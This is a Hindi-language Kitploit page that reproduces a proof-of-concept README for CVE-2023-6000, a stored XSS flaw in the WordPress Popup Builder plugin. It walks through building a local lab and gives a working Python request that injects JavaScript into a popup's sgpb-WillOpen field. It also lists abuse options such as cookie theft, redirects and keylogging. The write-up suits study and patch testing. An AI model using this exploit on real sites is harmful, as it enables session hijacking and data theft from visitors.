Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-6000-POC — यह भेद्यता एक वर्डप्रेस पॉपअप प्लगइन में XSS दोष प्रदर्शित करती है, जिससे हमलावर संग्रहीत XSS के माध्यम से दुर्भावनापूर्ण जावास्क्रिप्ट इंजेक्ट कर सकते हैं। | Kitploit
उपकरण/GitHubGitHub/ronf98/cve-2023-6000-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubronf98/cve-2023-6000-poc

CVE-2023-6000-POC

यह भेद्यता एक वर्डप्रेस पॉपअप प्लगइन में XSS दोष प्रदर्शित करती है, जिससे हमलावर संग्रहीत XSS के माध्यम से दुर्भावनापूर्ण जावास्क्रिप्ट इंजेक्ट कर सकते हैं।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

सामान्य विवरण

  • CVE-ID : CVE-2023-6000
  • CVSS स्कोर : 6.1
  • प्रकार : संग्रहीत XSS
  • निश्चित संस्करण : Popup Builder 4.2.3

यह भेद्यता एक हमलावर को वर्डप्रेस पॉपअप बिल्डर प्लगइन में क्रॉस-साइट स्क्रिप्टिंग (XSS) दोष का शोषण करने की अनुमति देती है। प्लगइन सामान्य विज़िटरों को मौजूदा पॉपअप को संशोधित करने से रोकने में विफल रहता है और सर्वर को एक विशेष रूप से तैयार अनुरोध भेजकर, हमलावर पॉपअप में दुर्भावनापूर्ण स्क्रिप्ट इंजेक्ट कर सकता है, जो उपयोगकर्ताओं द्वारा पॉपअप के साथ इंटरैक्ट करने पर निष्पादित होगी।

इस POC के लिए, भेद्यता पॉपअप के खुलने के व्यवहार में हेरफेर करके ट्रिगर होगी, जहां एक सरल अलर्ट स्क्रिप्ट, पॉपअप खुलने पर चलाने के लिए इंजेक्ट की जाएगी। इस प्रकार का हमला कई समस्याओं को जन्म दे सकता है, जिसमें संवेदनशील जानकारी तक अनधिकृत पहुंच और प्रभावित वेबसाइट का आगे शोषण शामिल है, जो संभावित रूप से उपयोगकर्ता डेटा या पूरी साइट से समझौता कर सकता है।

POC पर्यावरण सेटअप

  1. स्थानीय वेब सर्वर होस्ट करने के लिए XAMPP डाउनलोड करें (नवीनतम संस्करण)
  2. एक SQL डेटाबेस बनाएं
  3. वर्डप्रेस इंस्टॉल करें (नवीनतम संस्करण)
  4. वर्डप्रेस-एडमिन में जाएं और पॉपअप बिल्डर का एक कमजोर संस्करण इंस्टॉल करें (<4.2.3)
  5. भेद्यता प्रदर्शित करने के लिए एक सरल फ्रंट पेज और पॉपअप सेटअप करें

चरण 1: XAMPP

इस POC के लिए हम एक विंडोज 10 मशीन का उपयोग कर सकते हैं और XAMPP डाउनलोड कर सकते हैं: https://www.apachefriends.org/download.html
इंस्टॉलेशन के बाद, Apache और MySQL मॉड्यूल को चालू करना सुनिश्चित करें:

image

चरण 2: SQL DB

वर्डप्रेस, अधिकांश सामग्री प्रबंधन प्रणालियों की तरह, अपने सभी आवश्यक डेटा को संग्रहीत करने के लिए एक डेटाबेस की आवश्यकता होती है, हम जो SQL डेटाबेस बनाएंगे, वह इस सभी जानकारी के लिए केंद्रीय भंडारण के रूप में कार्य करता है।

  • अपने ब्राउज़र पर, http://localhost/phpmyadmin पर जाएं
  • डेटाबेस टैब पर जाएं और एक नया डेटाबेस बनाएं (जैसे, wordpress_db)।
  • डेटाबेस का नाम नोट करें क्योंकि आपको वर्डप्रेस सेटअप के दौरान इसकी आवश्यकता होगी।

चरण 3: वर्डप्रेस

  • उनकी आधिकारिक साइट से वर्डप्रेस डाउनलोड करें - https://wordpress.org/download/
  • डाउनलोड करने के बाद, वर्डप्रेस ज़िप फ़ाइल को C:\xampp\htdocs\ के अंतर्गत अपने XAMPP इंस्टॉलेशन निर्देशिका के फ़ोल्डर में निकालें।
  • इसके बाद, http://localhost/wordpress पर जाएं जो इंस्टॉलेशन स्क्रीन लाएगा।
  • डेटाबेस नाम में, हमारे द्वारा बनाया गया SQL DB नाम दर्ज करें, बाकी डिफ़ॉल्ट रह सकता है (उपयोगकर्ता:root, पास:खाली (XAMPP के लिए डिफ़ॉल्ट))।
  • यदि डेटाबेस कनेक्शन सफल होता है, तो आप बाद में एक्सेस के लिए एक एडमिन उपयोगकर्ता सेटअप कर सकते हैं।

चरण 4: Popup Builder

पॉपअप बिल्डर प्लगइन का कमजोर संस्करण उनकी मुख्य साइट से डाउनलोड किया जा सकता है: https://wordpress.org/plugins/popup-builder/advanced/ 4.2.3 में फिक्स से पहले का एक पुराना संस्करण चुनें: image इसके बाद, अपने एडमिन वर्डप्रेस पेज पर जाएं - http://localhost/wordpress/wp-login.php Plugins -> Add New Plugin -> Upload Plugin -> डाउनलोड की गई .ZIP फ़ाइल चुनें और इंस्टॉल करें

चरण 5: फ्रंट पेज और पॉपअप

वर्डप्रेस-एडमिन पेज पर, हम Pages -> Add New Page -> Choose a Pattern पर जाकर एक सरल फ्रंट पेज बना सकते हैं। पॉपअप के लिए, Popup Builder -> Add New पर जाएं -> प्रकार चुनें और अनुकूलित करें। इस POC के लिए, मैंने एक सब्सक्रिप्शन पॉपअप चुना, क्योंकि यह आजकल वेबसाइटों पर सबसे आम पॉपअप में से एक है। image

डिस्प्ले रूल्स टैब में, आप पॉपअप को अपने फ्रंट पेज से जोड़ सकते हैं: image

अब जब हम http://localhost/wordpress/ का उपयोग करके अपने फ्रंट पेज में प्रवेश करते हैं, हम अपने पॉपअप को ट्रिगर होते देख सकते हैं।

शोषण

शोषण को निष्पादित करने के लिए, हमें पहले पॉपअप आईडी की पहचान करनी होगी। यह साइट पर नेविगेट करके, पॉपअप को ट्रिगर करके और डेवलपर टूल्स में नेटवर्क टैब खोलकर किया जा सकता है। admin-ajax.php अनुरोध देखें, जो एक कोर वर्डप्रेस घटक है जो AJAX अनुरोधों को संभालने के लिए उपयोग किया जाता है। पॉपअप बिल्डर वर्डप्रेस में पॉपअप को सहेजने, अपडेट करने, पूर्वावलोकन करने और नियंत्रित करने जैसे कार्यों को प्रबंधित करने के लिए इसका उपयोग करता है।

पेलोड टैब के अंतर्गत, हम पॉपअप आईडी पा सकते हैं:

image

पॉपअप आईडी खोजने के बाद, हम शोषण को ट्रिगर करने के लिए निम्नलिखित स्क्रिप्ट का उपयोग कर सकते हैं:

root@kitploit:~
import requests

# कमजोर साइट के लिए लक्ष्य URL परिभाषित करें
url = "http://localhost/wordpress/"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
data = {
    "sgpb-is-preview": "1",
    "post_ID": "22",     #हमें मिली पॉपअप आईडी का उपयोग करें
    "sgpb-type": "html",
    "sgpb-WillOpen": "alert('Stored XSS Executed Successfully');"     #कस्टम JS कोड यहां जाता है
    }

# POST अनुरोध भेजें और परिणाम आउटपुट करें
response = requests.post(url, data=data)
print(response.text)

अतिरिक्त विकल्प

चूंकि हम पॉपअप को संपादित कर सकते हैं, हम अपने कस्टम JS के ट्रिगर समय को भी नियंत्रित कर सकते हैं। यदि हम वर्डप्रेस-एडमिन पेज पर जाते हैं, तो पॉपअप सेटिंग में हम एक "Custom JS or CSS" विकल्प देख सकते हैं, यह कस्टम कोड के समय को नियंत्रित करेगा:

  • "sgpb-ShouldOpen" : पॉपअप खुलना शुरू होने से पहले निष्पादित होता है, जांचता है कि इसे खुलना चाहिए या नहीं।
  • "sgpb-WillOpen" : पॉपअप खुलने से ठीक पहले चलता है, अंतिम-क्षण की कार्रवाइयों की अनुमति देता है।
  • "sgpb-DidOpen" : पॉपअप पूरी तरह से खुलने के तुरंत बाद निष्पादित होता है, पोस्ट-लोड क्रियाओं (जैसे, XSS) के लिए आदर्श।
  • "sgpb-ShouldClose" : पॉपअप बंद होना शुरू होने से पहले ट्रिगर की गई जांच या कार्रवाइयां।
  • "sgpb-WillClose" : पॉपअप बंद होने से ठीक पहले चलता है, अंतिम परिवर्तनों की अनुमति देता है।
  • "sgpb-DidClose" : पॉपअप पूरी तरह से बंद होने के तुरंत बाद निष्पादित होता है।

image

हम इसे अपनी इच्छित उपयोग के अनुसार अपनी स्क्रिप्ट में शामिल कर सकते हैं।

निष्पादन

स्क्रिप्ट को ट्रिगर करने के बाद, हम वर्डप्रेस-एडमिन पेज में देख सकते हैं कि हमारे पॉपअप के कस्टम JS अनुभाग में एक नई लाइन जोड़ी गई है:

image

अब जब एक सामान्य उपयोगकर्ता के रूप में साइट में प्रवेश करते हैं, तो हम निम्नलिखित संदेश को प्रॉम्प्ट होते देख सकते हैं:

image

हम यह भी देख सकते हैं कि हमारा संदेश SQL डेटाबेस (डिफ़ॉल्ट रूप से wp_postmeta तालिका के अंतर्गत) में सहेजा गया था, जो संग्रहीत XSS होने की पुष्टि करता है:

image

संभावित उपयोग

पॉपअप बिल्डर प्लगइन में यह संग्रहीत XSS भेद्यता हमलावर को दुर्भावनापूर्ण JavaScript एम्बेड करने की अनुमति देती है जो जब भी कोई उपयोगकर्ता संक्रमित पॉपअप के साथ इंटरैक्ट करता है, निष्पादित हो सकता है। दुर्भावनापूर्ण तरीके से इसका शोषण करने के निम्नलिखित तरीके हैं:

  • सत्र अपहरण : दुर्भावनापूर्ण JS कोड सत्र कुकीज़ चुरा सकता है और उन्हें किसी बाहरी डोमेन पर भेज सकता है, जिससे हमलावर उपयोगकर्ता खातों पर कब्जा कर सकते हैं।
  • पुनर्निर्देशन : स्क्रिप्ट उपयोगकर्ताओं को नकली लॉगिन पेजों या अन्य दुर्भावनापूर्ण साइटों पर पुनर्निर्देशित कर सकती है (यह निम्न JS कोड जोड़कर किया जा सकता है: window.location.href = 'https://facebook.com')
  • ड्राइव-बाय डाउनलोड : हमलावर दुर्भावनापूर्ण फ़ाइलों के डाउनलोड को ट्रिगर कर सकता है, जिससे उपयोगकर्ता अनजाने में मैलवेयर इंस्टॉल कर सकते हैं।
  • विरूपण और गलत सूचना : इंजेक्ट की गई स्क्रिप्ट पेज सामग्री में हेरफेर कर सकती है, साइट को विकृत कर सकती है या उपयोगकर्ताओं को गलत जानकारी प्रदर्शित कर सकती है।
  • कीलॉगर : दुर्भावनापूर्ण स्क्रिप्ट का उपयोग उपयोगकर्ता कीस्ट्रोक्स को लॉग करने, संवेदनशील डेटा और व्यक्तिगत जानकारी कैप्चर करने और फिर इसे हमलावर के डोमेन पर भेजने के लिए किया जा सकता है।
टूल डाउनलोड करें